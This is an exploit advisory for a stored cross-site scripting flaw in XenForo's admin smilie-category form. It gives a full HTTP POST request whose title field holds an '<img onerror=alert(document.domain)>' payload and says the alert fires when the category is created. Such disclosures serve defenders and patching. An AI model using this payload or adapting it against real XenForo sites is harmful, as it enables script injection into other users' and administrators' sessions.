Xenforo Version 2.2.13>x - Authenticated Stored XSS

2023.06.25
tr Furkan Karaarslan (TR) tr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Xenforo Version 2.2.13>x - Authenticated Stored XSS # Dork: # Date: 2023-06-24 # Exploit Author: Furkan Karaarslan # Category : Webapps # Vendor Homepage: https://x.com/admin.php?smilies # Version: 2.2.12 (REQUIRED) # Tested on: Windows/Linux # CVE : ----------------------------------------------------------------------------- Requests POST /admin.php?smilie-categories/0/save HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/admin.php?smilies/ X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------333176689514537912041638543422 Content-Length: 1038 Origin: http://127.0.0.1 Connection: close Cookie: xf_csrf=aEWkQ90jbPs2RECi; xf_session=yCLGXIhbOq9bSNKAsymJPWYVvTotiofa; xf_session_admin=wlr6UqjWxCkpfjKlngAvH5t-4yGiK5mQ Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="_xfToken" 1687616851,83fd2350307156281e51b17e20fe575b -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="title" <img src=x onerror=alert(document.domain)> -----------------------------333176689514537912041638543422 Content-Disposition: form-data; name="display_order" Response: After it is created, an alert comes immediately.


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top